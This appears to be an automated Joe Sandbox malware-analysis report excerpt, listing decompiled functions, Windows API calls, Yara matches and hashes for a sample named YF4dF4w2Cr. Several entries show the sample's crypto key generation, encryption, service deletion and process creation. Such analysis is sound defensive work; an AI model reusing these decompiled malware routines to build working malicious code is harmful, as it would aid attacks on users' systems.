						if(_t73 != 0) {
							 *((intOrPtr*)(_t73 + 8)) = 3;
							E00402CA0(_t73 + 0x10, 0x104,  *(_t94 - 0x158));
						}
						goto L5;
					} else {
						E004048ED(_t73, _t77, _t91, 0x104, _t91, 0x104,  *(_t94 - 0x158), 0xffffffff);
						E004290E3(_t73,  *(_t94 - 0x158));
						L5:
						L22:
						return E00431B87(_t73, _t91, 0x104);
					}
				}
				L1:
				_t45 = E00406436(_t73, _t75, _t91, _t92, _t100);
				goto L2;
			}
















                  0x00429112
                  0x00429112
                  0x00429112
                  0x0042911c
                  0x00429121
                  0x00429124
                  0x00429127
                  0x0042912c
                  0x0042912e
                  0x00429131
                  0x00429137
                  0x00429139
                  0x00429140
                  0x00429142
                  0x00429144
                  0x00429149
                  0x00000000
                  0x00000000
                  0x0042914b
                  0x0042915a
                  0x00429162
                  0x00429189
                  0x0042918b
                  0x004291ae
                  0x004291b3
                  0x004291bf
                  0x004291ca
                  0x004291d0
                  0x004291d2
                  0x00429296
                  0x0042929f
                  0x004292a6
                  0x00000000
                  0x004292a6
                  0x004291f1
                  0x004291f7
                  0x004291f9
                  0x0042921a
                  0x00429221
                  0x00429224
                  0x00429224
                  0x0042922a
                  0x00429231
                  0x00429240
                  0x00429246
                  0x00429249
                  0x00000000
                  0x00000000
                  0x0042924c
                  0x00429252
                  0x00429259
                  0x00000000
                  0x00000000
                  0x0042925b
                  0x00429261
                  0x00000000
                  0x00000000
                  0x0042926a
                  0x00429276
                  0x0042927a
                  0x0042927c
                  0x004292af
                  0x004292b1
                  0x004292c0
                  0x004292c7
                  0x004292c7
                  0x00429207
                  0x00429210
                  0x00000000
                  0x00429210
                  0x00429285
                  0x0042928e
                  0x00429293
                  0x00000000
                  0x00429231
                  0x004291fb
                  0x00429202
                  0x00000000
                  0x00429202
                  0x0042918d
                  0x0042918f
                  0x0042919a
                  0x004291a1
                  0x004291a1
                  0x00000000
                  0x00429164
                  0x0042916e
                  0x0042917d
                  0x00429182
                  0x004292a7
                  0x004292ac
                  0x004292ac
                  0x00429162
                  0x0042913b
                  0x0042913b
                  0x00000000

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 0042911C
                  • GetFullPathNameA.KERNEL32(00000000,00000104,?,?,00000158,004292E3,?,?,00000000,?,0041D5EC,?,?), ref: 0042915A
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • PathIsUNCA.SHLWAPI(?,?,?,?,0041D5EC,?,?), ref: 004291CA
                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,0041D5EC,?,?), ref: 004291F1
                  • CharUpperA.USER32(?), ref: 00429224
                  • FindFirstFileA.KERNEL32(?,?), ref: 00429240
                  • FindClose.KERNEL32(00000000), ref: 0042924C
                  • lstrlenA.KERNEL32(?), ref: 0042926A
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
                  • String ID:
                  • API String ID: 624941980-0
                  • Opcode ID: b8858de18712f8b80784316cab7b21761622b608ed6791508cb3c03fc169abe2
                  • Instruction ID: 4c08258b8b62b4c28abc3044bc15ce8abfe974271ea14c90092fafafccbe739e
                  • Opcode Fuzzy Hash: b8858de18712f8b80784316cab7b21761622b608ed6791508cb3c03fc169abe2
                  • Instruction Fuzzy Hash: 1141C571A00225EBEF259F62DC48BFE7778BF45315F4005EEB405A5291DB384E90CE18
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023E2F82, Relevance: 10.9, APIs: 7, Instructions: 416COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: _memset$memcpy
                  • String ID:
                  • API String ID: 3131771470-0
                  • Opcode ID: 73c9105ae49c3c53f6ada482c292e5c7291b0b22305bb21d63a38a4a9f4047c9
                  • Instruction ID: 1b7e950ac32ea45f1d8c1968f72422388b7a2cca458793967456893b32b16246
                  • Opcode Fuzzy Hash: 73c9105ae49c3c53f6ada482c292e5c7291b0b22305bb21d63a38a4a9f4047c9
                  • Instruction Fuzzy Hash: 5F023830A0067AEFCF1ACF68C8856FABB75FF44304F1401A9C45797A82D732A569CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00430650, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 85%
                  			E00430650(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x463404; // 0x18eab29f
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x466af0 = _t6;
				 *0x466aec = _t22;
				 *0x466ae8 = _t25;
				 *0x466ae4 = _t21;
				 *0x466ae0 = _t27;
				 *0x466adc = _t26;
				 *0x466b08 = ss;
				 *0x466afc = cs;
				 *0x466ad8 = ds;
				 *0x466ad4 = es;
				 *0x466ad0 = fs;
				 *0x466acc = gs;
				asm("pushfd");
				_pop( *0x466b00);
				 *0x466af4 =  *_t31;
				 *0x466af8 = _v0;
				 *0x466b04 =  &_a4;
				 *0x466a40 = 0x10001;
				_t11 =  *0x466af8; // 0x0
				 *0x4669f4 = _t11;
				 *0x4669e8 = 0xc0000409;
				 *0x4669ec = 1;
				_t12 =  *0x463404; // 0x18eab29f
				_v812 = _t12;
				_t13 =  *0x463408; // 0xe7154d60
				_v808 = _t13;
				 *0x466a38 = IsDebuggerPresent();
				_push(1);
				E0043F5DB(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter("�iF");
				if( *0x466a38 == 0) {
					_push(1);
					E0043F5DB(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                  0x00430650
                  0x00430650
                  0x00430650
                  0x00430650
                  0x00430650
                  0x00430650
                  0x00430650
                  0x00430656
                  0x00430658
                  0x00430658
                  0x004365b7
                  0x004365bc
                  0x004365c2
                  0x004365c8
                  0x004365ce
                  0x004365d4
                  0x004365da
                  0x004365e1
                  0x004365e8
                  0x004365ef
                  0x004365f6
                  0x004365fd
                  0x00436604
                  0x00436605
                  0x0043660e
                  0x00436616
                  0x0043661e
                  0x00436629
                  0x00436633
                  0x00436638
                  0x0043663d
                  0x00436647
                  0x00436651
                  0x00436656
                  0x0043665c
                  0x00436661
                  0x0043666d
                  0x00436672
                  0x00436674
                  0x0043667c
                  0x00436687
                  0x00436694
                  0x00436696
                  0x00436698
                  0x0043669d
                  0x004366b1

                  APIs
                  • IsDebuggerPresent.KERNEL32 ref: 00436667
                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043667C
                  • UnhandledExceptionFilter.KERNEL32(iF), ref: 00436687
                  • GetCurrentProcess.KERNEL32(C0000409), ref: 004366A3
                  • TerminateProcess.KERNEL32(00000000), ref: 004366AA
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                  • String ID: iF
                  • API String ID: 2579439406-3484524759
                  • Opcode ID: 7d31ead20e52c6ad08ea01f80d0920bbbaf99ce8ff4a02c4ab0ad5d6fcf752bd
                  • Instruction ID: 1fcaefbcb6034eab115c8829309213c744fcf1b54137cc21ca0acf14dfd41614
                  • Opcode Fuzzy Hash: 7d31ead20e52c6ad08ea01f80d0920bbbaf99ce8ff4a02c4ab0ad5d6fcf752bd
                  • Instruction Fuzzy Hash: 1E21F2B8801200EFC700DF95ED45A047BA8FB0A311F12907AE809A7B61F7F199858F4F
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00415026, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 79%
                  			E00415026(void* __ecx, intOrPtr __edx, intOrPtr __edi, int _a4) {
				signed int _v8;
				char _v284;
				char _v288;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HINSTANCE__* _t13;
				intOrPtr* _t20;
				intOrPtr _t28;
				intOrPtr _t29;
				void* _t30;
				intOrPtr _t36;
				signed int _t37;
				void* _t39;
				intOrPtr _t40;
				signed int _t45;
				void* _t46;

				_t36 = __edi;
				_t35 = __edx;
				_t31 = __ecx;
				_t43 = _t45;
				_t46 = _t45 - 0x11c;
				_t9 =  *0x463404; // 0x18eab29f
				_v8 = _t9 ^ _t45;
				_t49 = _a4 - 0x800;
				_t39 = __ecx;
				_t28 = __edx;
				if(_a4 != 0x800) {
					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
					if(__eflags == 0) {
						goto L10;
					} else {
						goto L4;
					}
				} else {
					E004048C1(__edx, _t31, __edi, _t39, E00433C67(__edx,  &_v288, 4, "LOC"));
					_t46 = _t46 + 0x10;
					L4:
					_push(_t36);
					_t37 =  *(E00431D3E(_t49));
					 *(E00431D3E(_t49)) =  *_t16 & 0x00000000;
					_push( &_v288);
					_t30 = E00431BC3( &_v284, 0x112, 0x111, _t39, _t28);
					_t20 = E00431D3E(_t49);
					_t50 =  *_t20;
					if( *_t20 == 0) {
						 *(E00431D3E(__eflags)) = _t37;
					} else {
						E00405B7A( *((intOrPtr*)(E00431D3E(_t50))));
					}
					_pop(_t36);
					if(_t30 == 0xffffffff || _t30 >= 0x112) {
						L10:
						_t13 = 0;
						__eflags = 0;
					} else {
						_t13 = LoadLibraryA( &_v284);
					}
				}
				_pop(_t40);
				_pop(_t29);
				return E00430650(_t13, _t29, _v8 ^ _t43, _t35, _t36, _t40);
			}





















                  0x00415026
                  0x00415026
                  0x00415026
                  0x00415029
                  0x0041502b
                  0x00415031
                  0x00415038
                  0x0041503b
                  0x00415044
                  0x00415046
                  0x0041504e
                  0x00415076
                  0x00415078
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00415050
                  0x0041505e
                  0x00415063
                  0x0041507a
                  0x0041507a
                  0x00415080
                  0x00415087
                  0x00415090
                  0x004150ad
                  0x004150af
                  0x004150b4
                  0x004150b7
                  0x004150cd
                  0x004150b9
                  0x004150c0
                  0x004150c5
                  0x004150cf
                  0x004150d3
                  0x004150e8
                  0x004150e8
                  0x004150e8
                  0x004150d9
                  0x004150e0
                  0x004150e0
                  0x004150d3
                  0x004150ed
                  0x004150f0
                  0x004150f7

                  APIs
                  • _strcpy_s.LIBCMT ref: 00415058
                    • Part of subcall function 00431D3E: __getptd_noexit.LIBCMT ref: 00431D3E
                  • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 00415070
                  • __snwprintf_s.LIBCMT ref: 004150A5
                  • LoadLibraryA.KERNEL32(?), ref: 004150E0
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s_strcpy_s
                  • String ID: LOC
                  • API String ID: 1155623865-519433814
                  • Opcode ID: 0a57662b79aad635622cb36225d1b1c81f588a9f19dbb1269fc2e23230394805
                  • Instruction ID: 9d7d416408e1e055de0116fb72f58f37d90779cb6da9a35a11098e22952e4239
                  • Opcode Fuzzy Hash: 0a57662b79aad635622cb36225d1b1c81f588a9f19dbb1269fc2e23230394805
                  • Instruction Fuzzy Hash: 49210D71700608EBD7217BA5CC46BDE37ACEF4A315F100867F205A71E1DA7C9E458AA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 022F28C1, Relevance: 7.9, APIs: 5, Instructions: 416COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659583488.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_22f0000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: _memset
                  • String ID:
                  • API String ID: 2102423945-0
                  • Opcode ID: 12cd56997e3f0884bb4048a204ef5554fe657667fb4b2673287a6229841dc1e0
                  • Instruction ID: f98831e3c7eae32b0ab60125a26eacce2da9133b5da6bf3e8bc862731f23f913
                  • Opcode Fuzzy Hash: 12cd56997e3f0884bb4048a204ef5554fe657667fb4b2673287a6229841dc1e0
                  • Instruction Fuzzy Hash: 17025930910A6AEFCB1ACFA8C8947EAFB75FF06304F14027ACE5597645C736A561CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023ED3F5, Relevance: 7.6, APIs: 5, Instructions: 74servicestringCOMMON
                  Download Yara Rule
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 023ED414
                  • lstrlenW.KERNEL32(?), ref: 023ED44A
                  • OpenServiceW.ADVAPI32(00000000,00000000,00010000), ref: 023ED4A4
                  • DeleteService.ADVAPI32(00000000), ref: 023ED4B1
                  • CloseServiceHandle.ADVAPI32(00000000), ref: 023ED4B8
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: Service$CloseDeleteFileHandleModuleNameOpenlstrlen
                  • String ID:
                  • API String ID: 1755434187-0
                  • Opcode ID: 79d4994efae1e338f3c6bb56e8cd3a4cadb28038e81744237af49228c784f934
                  • Instruction ID: 31c1728f5d637fc5a54c0b0e0f421be985dccc297df7c80909c0bb1c9d2b0b30
                  • Opcode Fuzzy Hash: 79d4994efae1e338f3c6bb56e8cd3a4cadb28038e81744237af49228c784f934
                  • Instruction Fuzzy Hash: A5212675A0123E86CF785B189808BBB737CEF24795F400155E987D7591EF246A89CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023E1FFC, Relevance: 7.5, APIs: 5, Instructions: 36encryptionCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 023E1F75: CryptAcquireContextW.ADVAPI32(023F26E0,00000000,00000000,00000018,F0000040), ref: 023E1F8E
                    • Part of subcall function 023E1F75: CryptImportKey.ADVAPI32(?,?,00000000,00000000,023F26E4), ref: 023E1FD1
                    • Part of subcall function 023E1F75: LocalFree.KERNEL32(?), ref: 023E1FDC
                    • Part of subcall function 023E1F75: CryptReleaseContext.ADVAPI32(00000000), ref: 023E1FED
                  • CryptGenKey.ADVAPI32(0000660E,00000001,023F26E8,023E60FF,?,023EABE4,?,?,?,023EAC8F), ref: 023E2026
                  • CryptCreateHash.ADVAPI32(00008004,00000000,00000000,023F26EC,?,023EABE4,?,?,?,023EAC8F), ref: 023E2044
                  • CryptDestroyKey.ADVAPI32(?,023EABE4,?,?,?,023EAC8F), ref: 023E2058
                  • CryptDestroyKey.ADVAPI32(?,023EABE4,?,?,?,023EAC8F), ref: 023E2064
                  • CryptReleaseContext.ADVAPI32(00000000,?,023EABE4,?,?,?,023EAC8F), ref: 023E2072
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$Context$DestroyRelease$AcquireCreateFreeHashImportLocal
                  • String ID:
                  • API String ID: 4169801620-0
                  • Opcode ID: 1a9c2f523a84ecdf2654eaf9327928271385d8b933124a23baf2119cdcb1e183
                  • Instruction ID: aeb5aafe795ae81b598480772404135e1c7287d42b2645bac30b846f1bf73e89
                  • Opcode Fuzzy Hash: 1a9c2f523a84ecdf2654eaf9327928271385d8b933124a23baf2119cdcb1e183
                  • Instruction Fuzzy Hash: 30F0D6B17D0A11EBEFB52B34BD05B17365E7B44746F044924FB42A40E5DBE58C359A0C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00418BD1, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00418BD1(void* __ecx, int _a4, int _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t12;
				void* _t15;
				void* _t16;
				int _t19;
				void* _t20;

				_t17 = __ecx;
				_t19 = _a4;
				_t22 = _t19;
				if(_t19 == 0) {
					E00406436(_t15, __ecx, _t19, _t20, _t22);
				}
				_t16 = E0040EE3C(_t15, _t17, GetParent( *(_t19 + 0x20)));
				_t18 = _t16;
				if(E0041E99D(_t16, ?str?) != 0) {
					__eflags = _a8;
					if(_a8 != 0) {
						L8:
						return _t16;
					}
					while(1) {
						_t19 = E0040EE3C(_t16, _t18, GetParent( *(_t19 + 0x20)));
						__eflags = _t19;
						if(_t19 == 0) {
							goto L8;
						}
						_t12 = IsIconic( *(_t19 + 0x20));
						__eflags = _t12;
						if(_t12 != 0) {
							goto L3;
						}
					}
					goto L8;
				} else {
					L3:
					return 0;
				}
			}












                  0x00418bd1
                  0x00418bd9
                  0x00418bdc
                  0x00418bde
                  0x00418be0
                  0x00418be0
                  0x00418bf6
                  0x00418bfd
                  0x00418c06
                  0x00418c0c
                  0x00418c10
                  0x00418c32
                  0x00000000
                  0x00418c32
                  0x00418c21
                  0x00418c2c
                  0x00418c2e
                  0x00418c30
                  0x00000000
                  0x00000000
                  0x00418c17
                  0x00418c1d
                  0x00418c1f
                  0x00000000
                  0x00000000
                  0x00418c1f
                  0x00000000
                  0x00418c08
                  0x00418c08
                  0x00000000
                  0x00418c08

                  APIs
                  • GetParent.USER32(?), ref: 00418BEE
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • IsIconic.USER32 ref: 00418C17
                  • GetParent.USER32(?), ref: 00418C24
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Parent$Exception@8H_prolog3IconicThrow
                  • String ID: `&E
                  • API String ID: 144390861-1929257993
                  • Opcode ID: 3561b35d5b5b2dccbb8c54f4d40102134b81d5a0a069d7fdc0debe60c0056d39
                  • Instruction ID: 358e4306ae026a5a0e6fe1444b68b5067069f487fe9c63fcbe7e632c9dba3896
                  • Opcode Fuzzy Hash: 3561b35d5b5b2dccbb8c54f4d40102134b81d5a0a069d7fdc0debe60c0056d39
                  • Instruction Fuzzy Hash: C3F0A4353012096BDB202B73CC44A57BB5AEB903A4B11443FF80897210FE38DC5196F8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040C49C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                  Download Yara Rule
                  C-Code - Quality: 79%
                  			E0040C49C(struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				int _t16;

				if(E0040C354() == 0) {
					if((_a8 & 0x00000003) == 0) {
						if(IsIconic(_a4) == 0) {
							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
						} else {
							_t16 = GetWindowPlacement(_a4,  &_v48);
						}
						if(_t16 == 0) {
							return 0;
						} else {
							return E0040C44B( &(_v48.rcNormalPosition), _a8);
						}
					}
					return 0x12340042;
				}
				return  *0x46631c(_a4, _a8);
			}





                  0x0040c4ab
                  0x0040c4bf
                  0x0040c4d3
                  0x0040c4eb
                  0x0040c4d5
                  0x0040c4dc
                  0x0040c4dc
                  0x0040c4f3
                  0x00000000
                  0x0040c4f5
                  0x00000000
                  0x0040c4fc
                  0x0040c4f3
                  0x00000000
                  0x0040c4c1
                  0x00000000

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID:
                  • String ID: )@
                  • API String ID: 0-1834664782
                  • Opcode ID: 04563866b8390392b53dc5f501e0bdb632abd845a72dbd0a999c9ac41fcd9bfc
                  • Instruction ID: e39f0cd06dcc5d796e4c380b87086b00b9923f70f7885cf755144c167b23d7c0
                  • Opcode Fuzzy Hash: 04563866b8390392b53dc5f501e0bdb632abd845a72dbd0a999c9ac41fcd9bfc
                  • Instruction Fuzzy Hash: 14F01D35500108FBCF019FA1DC989BE7B69BB04344B548132FC15E51A0EB38DA56DB5A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023E215A, Relevance: 6.1, APIs: 4, Instructions: 89encryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptDuplicateHash.ADVAPI32(00000000,00000000,?), ref: 023E21BE
                  • CryptDecrypt.ADVAPI32(?,00000001,00000000,?,?), ref: 023E21EC
                  • CryptVerifySignatureW.ADVAPI32(?,?,00000060,00000000,00000000), ref: 023E2208
                  • CryptDestroyHash.ADVAPI32(?), ref: 023E2219
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$Hash$DecryptDestroyDuplicateSignatureVerify
                  • String ID:
                  • API String ID: 1014757615-0
                  • Opcode ID: 2203719cffdfeb0537e97bb009c77dd307c149177690b17048eaed3ed2eab3e1
                  • Instruction ID: e46b43cbf383eee8fe55c0cbc8bb350442ebd8a6366a6cf953b86fabd051d90f
                  • Opcode Fuzzy Hash: 2203719cffdfeb0537e97bb009c77dd307c149177690b17048eaed3ed2eab3e1
                  • Instruction Fuzzy Hash: 20318D71B50124EFDF218F68DC40BAA7BAEEF48710F104555EA06EB2D1D771AE158B50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023E1F75, Relevance: 6.0, APIs: 4, Instructions: 50encryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptAcquireContextW.ADVAPI32(023F26E0,00000000,00000000,00000018,F0000040), ref: 023E1F8E
                  • CryptImportKey.ADVAPI32(?,?,00000000,00000000,023F26E4), ref: 023E1FD1
                  • LocalFree.KERNEL32(?), ref: 023E1FDC
                  • CryptReleaseContext.ADVAPI32(00000000), ref: 023E1FED
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$Context$AcquireFreeImportLocalRelease
                  • String ID:
                  • API String ID: 3512700226-0
                  • Opcode ID: 92a8d68dbde839f7d5bde5734d276593e8e5b29dd1628249eb8b3a1bf3aa9878
                  • Instruction ID: fa4de337dee8a4ef0db6b2c5e21a8a3fbadece88791fbdd903446ac550e4ef38
                  • Opcode Fuzzy Hash: 92a8d68dbde839f7d5bde5734d276593e8e5b29dd1628249eb8b3a1bf3aa9878
                  • Instruction Fuzzy Hash: C4018F71A80258BBEBB10B96EC09F9B7F7CEB85B51F000155FB09B1090DBB14E21DBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023E207B, Relevance: 4.6, APIs: 3, Instructions: 85encryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptDuplicateHash.ADVAPI32(00000000,00000000,?), ref: 023E20CC
                  • CryptEncrypt.ADVAPI32(?,00000001,00000000,?,?,?), ref: 023E20FD
                  • CryptDestroyHash.ADVAPI32(?), ref: 023E2139
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$Hash$DestroyDuplicateEncrypt
                  • String ID:
                  • API String ID: 1128268866-0
                  • Opcode ID: 2b2c6395ff771a075eedcfaac6c39775b4701074dc5db83de4cb18860ecde3f6
                  • Instruction ID: b31e327e4a28f0287748c817f0799fc87201e5939b8fb258b16688bb8c73b97f
                  • Opcode Fuzzy Hash: 2b2c6395ff771a075eedcfaac6c39775b4701074dc5db83de4cb18860ecde3f6
                  • Instruction Fuzzy Hash: 75216FB5A40215EFDF209F64EC40AAABBBEEF04350F144655ED0A8B290EB70DE55CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023E1F11, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33encryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptExportKey.ADVAPI32(?,?,00000001,00000040,?,?), ref: 023E1F2F
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: CryptExport
                  • String ID: l
                  • API String ID: 3389274496-2517025534
                  • Opcode ID: 236d1d48d83456ec22b7d8e0d932c27f8c638a9ebcf8215bceda48f13ee1152f
                  • Instruction ID: 63b41f0ad15ff883f3e536dee2b202124345f6feaec9f92dd600477e2c5ecbde
                  • Opcode Fuzzy Hash: 236d1d48d83456ec22b7d8e0d932c27f8c638a9ebcf8215bceda48f13ee1152f
                  • Instruction Fuzzy Hash: 1DF02770900228AADF10DA64C844FFEBBBDDB01A04F10029AED46E7180E670AE0987D1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023E1D2B, Relevance: 3.1, APIs: 2, Instructions: 68processCOMMON
                  Download Yara Rule
                  APIs
                  • CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000400,?,00000000,?,?), ref: 023E1D8A
                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000400,?,00000000,?,?), ref: 023E1DBA
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateProcess$User
                  • String ID:
                  • API String ID: 4042571897-0
